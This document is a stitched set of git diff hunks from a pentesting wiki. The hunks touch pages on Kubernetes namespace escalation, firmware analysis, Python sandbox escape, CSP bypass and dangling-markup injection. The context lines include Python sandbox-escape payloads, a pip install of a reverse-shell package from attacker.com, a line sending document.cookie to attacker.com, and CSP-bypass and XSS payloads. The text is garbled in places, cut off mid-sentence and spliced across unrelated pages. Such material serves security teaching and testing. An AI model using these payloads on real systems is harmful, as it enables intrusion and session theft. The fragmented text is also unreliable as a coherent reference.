Support HackTricks and get benefits!
@@ -500,5 +498,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
Here are some techniques you can try to escape to a different namespace:
-## Abuse K8s privileges
+### Abuse K8s privileges
Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
@@ -31,7 +30,7 @@ For more info about which privileges you can abuse read:
[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/)
{% endcontent-ref %}
-## Escape to the node
+### Escape to the node
If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
@@ -41,12 +40,10 @@ If you can escape to the node either because you have compromised a pod and you
All these techniques are explained in:
-{% content-ref url="../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %}
-[attacking-kubernetes-from-inside-a-pod.md](../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
+{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %}
+[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %}
-
-
Support HackTricks and get benefits!
@@ -62,5 +59,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Introduction
+## Introduction
Firmware is a type of software that provides communication and control over a device’s hardware components. It’s the first piece of code that a device runs. Usually, it **boots the operating system** and provides very specific runtime services for programs by **communicating with various hardware components**. Most, if not all, electronic devices have firmware.
@@ -25,7 +24,7 @@ Devices store firmware in **nonvolatile memory**, such as ROM, EPROM, or flash m
It’s important to **examine** the **firmware** and then attempt to **modify** it, because we can uncover many security issues during this process.
-# **Information gathering and reconnaissance**
+## **Information gathering and reconnaissance**
During this stage, collect as much information about the target as possible to understand its overall composition underlying technology. Attempt to gather the following:
@@ -47,7 +46,7 @@ During this stage, collect as much information about the target as possible to u
Where possible, acquire data using open source intelligence (OSINT) tools and techniques. If open source software is used, download the repository and perform both manual as well as automated static analysis against the code base. Sometimes, open source software projects already use free static analysis tools provided by vendors that provide scan results such as [Coverity Scan](https://scan.coverity.com) and [Semmle’s LGTM](https://lgtm.com/#explore).
-# Getting the Firmware
+## Getting the Firmware
There are different ways with different difficulty levels to download the firmware
@@ -66,7 +65,7 @@ There are different ways with different difficulty levels to download the firmwa
* Removing the **flash chip** (e.g. SPI) or MCU from the board for offline analysis and data extraction (LAST RESORT).
* You will need a supported chip programmer for flash storage and/or the MCU.
-# Analyzing the firmware
+## Analyzing the firmware
Now that you **have the firmware**, you need to extract information about it to know how to treat it. Different tools you can use for that:
@@ -83,18 +82,18 @@ If you don't find much with those tools check the **entropy** of the image with
Moreover, you can use these tools to extract **files embedded inside the firmware**:
-{% content-ref url="../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
-[file-data-carving-recovery-tools.md](../../forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
+{% content-ref url="../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md" %}
+[file-data-carving-recovery-tools.md](../../generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
{% endcontent-ref %}
Or [**binvis.io**](https://binvis.io/#/) ([code](https://code.google.com/archive/p/binvis/)) to inspect the file.
-## Getting the Filesystem
+### Getting the Filesystem
With the previous commented tools like `binwalk -ev Support HackTricks and get benefits!
@@ -363,5 +361,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
These are some tricks to bypass python sandbox protections and execute arbitrary commands.
-# Command Execution Libraries
+## Command Execution Libraries
The first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:
@@ -66,9 +65,9 @@ Python try to **load libraries from the current directory first** (the following
.png>)
-# Bypass pickle sandbox with default installed python packages
+## Bypass pickle sandbox with default installed python packages
-## Default packages
+### Default packages
You can find a **list of pre-installed** packages here: [https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html](https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html)\
Note that from a pickle you can make the python env **import arbitrary libraries** installed in the system.\
@@ -89,7 +88,7 @@ print(base64.b64encode(pickle.dumps(P(), protocol=0)))
For more information about how does pickle works check this: [https://checkoway.net/musings/pickle/](https://checkoway.net/musings/pickle/)
-## Pip package
+### Pip package
Trick shared by **@isHaacK**
@@ -102,13 +101,13 @@ pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])
You can download the package to create the reverse shell here. Please, note that before using it you should **decompress it, change the `setup.py`, and put your IP for the reverse shell**:
-{% file src="../../../.gitbook/assets/reverse.tar.gz" %}
+{% file src="../../../.gitbook/assets/Reverse.tar.gz" %}
{% hint style="info" %}
This package is called `Reverse`.However, it was specially crafted so when you exit the reverse shell the rest of the installation will fail, so you **won't leave any extra python package installed on the server** when you leave.
{% endhint %}
-# Eval-ing python code
+## Eval-ing python code
This is really interesting if some characters are forbidden because you can use the **hex/octal/B64** representation to **bypass** the restriction:
@@ -133,7 +132,7 @@ exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))
```
-# Builtins
+## Builtins
* [**Builtins functions of python2**](https://docs.python.org/2/library/functions.html)
* [**Builtins functions of python3**](https://docs.python.org/3/library/functions.html)
@@ -145,7 +144,7 @@ __builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls")
```
-## No Builtins
+### No Builtins
When you don't have `__builtins__` you are not going to be able to import anything nor even read or write files as **all the global functions** (like `open`, `import`, `print`...) **aren't loaded**.\
However, **by default python import a lot of modules in memory**. This modules may seem benign, but some of them are **also importing dangerous** functionalities inside of them that can be accessed to gain even **arbitrary code execution**.
@@ -175,7 +174,7 @@ import __builtin__
get_flag.__globals__['__builtins__']['__import__']("os").system("ls")
```
-### Python3
+#### Python3
```python
# Obtain builtins from a globally defined function
@@ -194,7 +193,7 @@ get_flag.__globals__['__builtins__']
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **builtins**.
-### Python2 and Python3
+#### Python2 and Python3
```python
# Recover __builtins__ and make eveything easier
@@ -202,7 +201,7 @@ __builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__
__builtins__["__import__"]('os').system('ls')
```
-## Builtins payloads
+### Builtins payloads
```python
# Possible payloads once you have found the builtins
@@ -212,7 +211,7 @@ __builtins__["__import__"]('os').system('ls')
# See them below
```
-# Globals and locals
+## Globals and locals
Checking the **`globals`** and **`locals`** is a good way to know what you can access.
@@ -242,11 +241,11 @@ class_obj.__init__.__globals__
[**Below there is a bigger function**](./#recursive-search-of-builtins-globals) to find tens/**hundreds** of **places** were you can find the **globals**.
-# Discover Arbitrary Execution
+## Discover Arbitrary Execution
Here I want to explain how to easily discover **more dangerous functionalities loaded** and propose more reliable exploits.
-### Accessing subclasses with bypasses
+#### Accessing subclasses with bypasses
One of the most sensitive parts of this technique is to be able to **access the base subclasses**. In the previous examples this was done using `''.__class__.__base__.__subclasses__()` but there are **other possible ways**:
@@ -275,7 +274,7 @@ defined_func.__class__.__base__.__subclasses__()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()
```
-## Finding dangerous libraries loaded
+### Finding dangerous libraries loaded
For example, knowing that with the library **`sys`** it's possible to **import arbitrary libraries**, you can search for all the **modules loaded that have imported sys inside of them**:
@@ -383,7 +382,7 @@ __builtins__: _ModuleLock, _DummyModuleLock, _ModuleLockManager, ModuleSpec, Fil
"""
```
-# Recursive Search of Builtins, Globals...
+## Recursive Search of Builtins, Globals...
{% hint style="warning" %}
This is just **awesome**. If you are **looking for an object like globals, builtins, open or anything** just use this script to **recursively find places were you can find that object.**
@@ -511,7 +510,7 @@ You can check the output of this script in this page:
[output-searching-python-internals.md](output-searching-python-internals.md)
{% endcontent-ref %}
-# Python Format String
+## Python Format String
If you **send** a **string** to python that is going to be **formatted**, you can use `{}` to access **python internal information.** You can use the previous examples to access globals or builtins for example.
@@ -566,7 +565,7 @@ class HAL9000(object):
**More examples** about **format** **string** examples can be found in [**https://pyformat.info/**](https://pyformat.info)
-## Sensitive Information Disclosure Payloads
+### Sensitive Information Disclosure Payloads
```python
{whoami.__class__.__dict__}
@@ -579,7 +578,7 @@ class HAL9000(object):
{whoami.__globals__[server].__dict__[bridge].__dict__[db].__dict__}
```
-# Dissecting Python Objects
+## Dissecting Python Objects
{% hint style="info" %}
If you want to **learn** about **python bytecode** in depth read these **awesome** post about the topic: [**https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d**](https://towardsdatascience.com/understanding-python-bytecode-e7edaae8734d)
@@ -600,7 +599,7 @@ def get_flag(some_input):
return "Nope"
```
-### dir
+#### dir
```python
dir() #General dir() to find what we have loaded
@@ -609,7 +608,7 @@ dir(get_flag) #Get info tof the function
['__call__', '__class__', '__closure__', '__code__', '__defaults__', '__delattr__', '__dict__', '__doc__', '__format__', '__get__', '__getattribute__', '__globals__', '__hash__', '__init__', '__module__', '__name__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'func_closure', 'func_code', 'func_defaults', 'func_dict', 'func_doc', 'func_globals', 'func_name']
```
-### globals
+#### globals
`__globals__` and `func_globals`(Same) Obtains the global environment. In the example you can see some imported modules, some global variables and their content declared:
@@ -624,7 +623,7 @@ CustomClassObject.__class__.__init__.__globals__
[**See here more places to obtain globals**](./#globals-and-locals)
-## **Accessing the function code**
+### **Accessing the function code**
**`__code__`** and `func_code`: You can **access** this **attribute** of the function to **obtain the code object** of the function.
@@ -642,7 +641,7 @@ dir(get_flag.__code__)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount', 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno', 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names', 'co_nlocals', 'co_stacksize', 'co_varnames']
```
-## Getting Code Information
+### Getting Code Information
```python
# Another example
@@ -690,7 +689,7 @@ get_flag.__code__.co_code
'd\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x00|\x00\x00|\x02\x00k\x02\x00r(\x00d\x05\x00Sd\x06\x00Sd\x00\x00S'
```
-## **Disassembly a function**
+### **Disassembly a function**
```python
import dis
@@ -744,7 +743,7 @@ dis.dis('d\x01\x00}\x01\x00d\x02\x00}\x02\x00d\x03\x00d\x04\x00g\x02\x00}\x03\x0
47 RETURN_VALUE
```
-# Compiling Python
+## Compiling Python
Now, lets imagine that somehow you can **dump the information about a function that you cannot execute** but you **need** to **execute** it.\
Like in the following example, you **can access the code object** of that function, but just reading the disassemble you **don't know how to calculate the flag** (_imagine a more complex `calc_flag` function_)
@@ -762,7 +761,7 @@ def get_flag(some_input):
return "Nope"
```
-## Creating the code object
+### Creating the code object
First of all, we need to know **how to create and execute a code object** so we can create one to execute our function leaked:
@@ -795,7 +794,7 @@ types.CodeType.__doc__
```
{% endhint %}
-## Recreating a leaked function
+### Recreating a leaked function
{% hint style="warning" %}
In the following example we are going to take all the data needed to recreate the function from the function code object directly. In a **real example**, all the **values** to execute the function **`code_type`** is what **you will need to leak**.
@@ -812,7 +811,7 @@ function_type(code_obj, mydict, None, None, None)("secretcode")
#ThisIsTheFlag
```
-## Bypass Defenses
+### Bypass Defenses
In previous examples at the begging of this post you can see **how to execute any python code using the `compile` function**. This is really interesting because you can **execute whole scripts** with loops and everything in a **one liner** (and we could do the same using **`exec`**).\
Anyway, sometimes it could be useful to **create** a **compiled object** in a local machine and execute it in the **CTF machine** (for example because we don't have the `compiled` function in the CTF).
@@ -856,19 +855,19 @@ f = ftype(ctype(1, 1, 1, 67, '|\x00\x00GHd\x00\x00S', (None,), (), ('s',), 'stdi
f(42)
```
-# Decompiling Compiled Python
+## Decompiling Compiled Python
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.
**Check out this tutorial**:
-{% content-ref url="../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
-[.pyc.md](../../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
+{% content-ref url="../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
+[.pyc.md](../../../generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %}
-# Misc Python
+## Misc Python
-## Assert
+### Assert
Python executed with optimizations with the param `-O` will remove asset statements and any code conditional on the value of **debug**.\
Therefore, checks like
@@ -884,7 +883,7 @@ def check_permission(super_user):
will be bypassed
-# References
+## References
* [https://lbarman.ch/blog/pyjail/](https://lbarman.ch/blog/pyjail/)
* [https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/](https://ctf-wiki.github.io/ctf-wiki/pwn/linux/sandbox/python-sandbox-escape/)
@@ -893,7 +892,6 @@ will be bypassed
* [https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html](https://nedbatchelder.com/blog/201206/eval\_really\_is\_dangerous.html)
* [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6)
-
Support HackTricks and get benefits!
@@ -909,5 +907,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# What is CSP
+## What is CSP
Content Security Policy or CSP is a built-in browser technology which **helps protect from attacks such as cross-site scripting (XSS)**. It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascript and more. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line and allow string code executing functions like `eval`, `setTimeout` or `setInterval:`
@@ -35,12 +34,12 @@ Implemented via meta tag:
```
-## Headers
+### Headers
* `Content-Security-Policy`
* `Content-Security-Policy-Report-Only`This one won't block anything, only send reports (use in Pre environment).
-# Defining resources
+## Defining resources
CSP works by restricting the origins that active and passive content can be loaded from. It can additionally restrict certain aspects of active content such as the execution of inline javascript, and the use of `eval()`.
@@ -56,7 +55,7 @@ media-src https://videos.cdn.mozilla.net;
object-src 'none';
```
-## Directives
+### Directives
* **script-src**: This directive specifies allowed sources for JavaScript. This includes not only URLs loaded directly into elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution.
* **default-src**: This directive defines the policy for fetching resources by default. When fetch directives are absent in CSP header the browser follows this directive by default.
@@ -75,7 +74,7 @@ object-src 'none';
* **upgrade-insecure-requests**: This directive instructs browsers to rewrite URL schemes, changing HTTP to HTTPS. This directive can be useful for websites with large numbers of old URL's that need to be rewritten.
* **sandbox**: sandbox directive enables a sandbox for the requested resource similar to the sandbox attribute. It applies restrictions to a page's actions including preventing popups, preventing the execution of plugins and scripts, and enforcing a same-origin policy.
-## **Sources**
+### **Sources**
* \*: This allows any URL except `data:` , `blob:` , `filesystem:` schemes
* **self**: This source defines that loading of resources on the page is allowed from the same domain.
@@ -87,9 +86,9 @@ object-src 'none';
* **nonce**: A whitelist for specific inline scripts using a cryptographic nonce (number used once). The server must generate a unique nonce value each time it transmits a policy.
* **sha256-\ {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}}
```
-### Other payloads:
+#### Other payloads:
```markup
@@ -187,7 +186,7 @@ Load a vulnerable version of angular and execute arbitrary JS:
```
-## Third Party Endpoints + JSONP
+### Third Party Endpoints + JSONP
```http
Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none';
@@ -204,22 +203,22 @@ Scenarios like this where `script-src` is set to `self` and a particular domain
The same vulnerability will occur if the **trusted endpoint contains an Open Redirect**, because if the initial endpoint is trusted, redirects are trusted.
-## Folder path bypass
+### Folder path bypass
If CSP policy points to a folder and you use **%2f** to encode **"/"**, it is still considered to be inside the folder. All browsers seem to agree on that.\
This leads to a possible bypass, by using "**%2f..%2f**" if server decodes it. For example, if CSP allows `http://example.com/company/` you can bypass the folder restriction and execute: `http://example.com/company%2f..%2fattacker/file.js`
Online Example:[ ](https://jsbin.com/werevijewa/edit?html,output)[https://jsbin.com/werevijewa/edit?html,output](https://jsbin.com/werevijewa/edit?html,output)
-## Iframes JS execution
+### Iframes JS execution
{% content-ref url="../xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md](../xss-cross-site-scripting/iframes-in-xss-and-csp.md)
{% endcontent-ref %}
-## missing **base-uri**
+### missing **base-uri**
-If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection.md).
+If the **base-uri** directive is missing you can abuse it to perform a [**dangling markup injection**](../dangling-markup-html-scriptless-injection/).
Moreover, if the **page is loading a script using a relative path** (like `/js/app.js`) using a **Nonce**, you can abuse the **base** **tag** to make it **load** the script from **your own server achieving a XSS.**\
If the vulnerable page is loaded with **httpS**, make use a httpS url in the base.
@@ -228,7 +227,7 @@ If the vulnerable page is loaded with **httpS**, make use a httpS url in the bas
```
-## [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
+### [CVE-2020-6519](https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/)
```javascript
document.querySelector('DIV').innerHTML="";
```
-## Leaking Information CSP + Iframe
+### Leaking Information CSP + Iframe
Imagine a situation where a **page is redirecting** to a different **page with a secret depending** on the **user**. For example the user **admin** accessing **redirectme.domain1.com** is redirected to: **adminsecret321.domain2.com** and you can cause a XSS to the admin.\
**Also the page redirected isn't allowed by the security policy, but the page that redirects is.**
@@ -368,11 +367,11 @@ img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev http
Trick from [**here**](https://ctftime.org/writeup/29310).
-# CSP Exfiltration Bypasses
+## CSP Exfiltration Bypasses
If there is a strict CSP that doesn't allow you to **interact with external servers**, there some things you can always do to exfiltrate the information.
-## Location
+### Location
You could just update the location to send to the attackers server the secret information:
@@ -381,7 +380,7 @@ var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
```
-## Meta tag
+### Meta tag
You could redirect injecting a meta tag (this is just a redirect, this won't leak content)
@@ -389,7 +388,7 @@ You could redirect injecting a meta tag (this is just a redirect, this won't lea
```
-## DNS Prefetch
+### DNS Prefetch
To load pages faster, browsers are going to pre-resolve hostnames into IP addresses and cache them for a later usage.\
You can indicate a browser to pre-resolve a hostname with: ``
@@ -421,7 +420,7 @@ X-DNS-Prefetch-Control: off
Apparently this technique doesn't work in headless browsers (bots)
{% endhint %}
-## WebRTC
+### WebRTC
In several pages you can read that **WebRTC doesn't check the `connect-src` policy** of the CSP.
@@ -432,13 +431,13 @@ pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp));
However, it doesn't look like it's [not possible anymore](https://github.com/w3c/webrtc-nv-use-cases/issues/35) (or at least not that easy).
-If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)****
+If you know how to exfiltrate info with WebRTC [**send a pull request please!**](https://github.com/carlospolop/hacktricks)\*\*\*\*
-# Policy Injection
+## Policy Injection
**Research:** [**https://portswigger.net/research/bypassing-csp-with-policy-injection**](https://portswigger.net/research/bypassing-csp-with-policy-injection)
-## Chrome
+### Chrome
If a **parameter** sent by you is being **pasted inside** the **declaration** of the **policy,** then you could **alter** the **policy** in some way that makes **it useless**. You could **allow script 'unsafe-inline'** with any of these bypasses:
@@ -450,21 +449,21 @@ script-src-elem 'unsafe-inline'; script-src-attr 'unsafe-inline'
Because this directive will **overwrite existing script-src directives**.\
You can find an example here: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=%3Bscript-src-elem+\*\&y=%3Cscript+src=%22http://subdomain1.portswigger-labs.net/xss/xss.js%22%3E%3C/script%3E)
-## Edge
+### Edge
In Edge is much simpler. If you can add in the CSP just this: **`;_`** **Edge** would **drop** the entire **policy**.\
Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert(1)%3C/script%3E](http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y=%3Cscript%3Ealert\(1\)%3C/script%3E)
-# Checking CSP Policies Online
+## Checking CSP Policies Online
* [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
* [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
-# Automatically creating CSP
+## Automatically creating CSP
[https://csper.io/docs/generating-content-security-policy](https://csper.io/docs/generating-content-security-policy)
-# References
+## References
{% embed url="https://hackdefense.com/blog/csp-the-how-and-why-of-a-content-security-policy/" %}
@@ -474,7 +473,6 @@ Example: [http://portswigger-labs.net/edge\_csp\_injection\_xndhfye721/?x=;\_\&y
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme" %}
-
-
-
diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index a4697628d..b36c02377 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -183,7 +183,7 @@ To set the domain name of the server in the URL that the Referrer is going to se
### **Exfiltrating CSRF Token**
-If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection.md) vulnerability.
+If a **CSRF token** is being used as **defence** you could try to **exfiltrate it** abusing a [**XSS**](xss-cross-site-scripting/#xss-stealing-csrf-tokens) vulnerability or a [**Dangling Markup**](dangling-markup-html-scriptless-injection/) vulnerability.
### **GET using HTML tags**
diff --git a/pentesting-web/dangling-markup-html-scriptless-injection.md b/pentesting-web/dangling-markup-html-scriptless-injection/README.md
similarity index 91%
rename from pentesting-web/dangling-markup-html-scriptless-injection.md
rename to pentesting-web/dangling-markup-html-scriptless-injection/README.md
index c5d3ef9bb..f8f9f07cf 100644
--- a/pentesting-web/dangling-markup-html-scriptless-injection.md
+++ b/pentesting-web/dangling-markup-html-scriptless-injection/README.md
@@ -1,4 +1,4 @@
-
+# Dangling Markup - HTML scriptless injection
.
@@ -60,7 +59,7 @@ You could also insert a `<base` tag. All the information will be sent until the
steal me)
test
```
-## Stealing forms
+### Stealing forms
```markup
Support HackTricks and get benefits!
@@ -490,5 +488,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,17 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## Resume
-# Resume
-
-This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.\
+This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](../xss-cross-site-scripting/)but you can **inject some HTML tags**.\
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
-Several techniques commented here can be used to bypass some [**Content Security Policy**](content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
+Several techniques commented here can be used to bypass some [**Content Security Policy**](../content-security-policy-csp-bypass/) by exfiltrating information in unexpected ways (html tags, CSS, http-meta tags, forms, base...).
-# Main Applications
+## Main Applications
-## Stealing clear text secrets
+### Stealing clear text secrets
If you inject `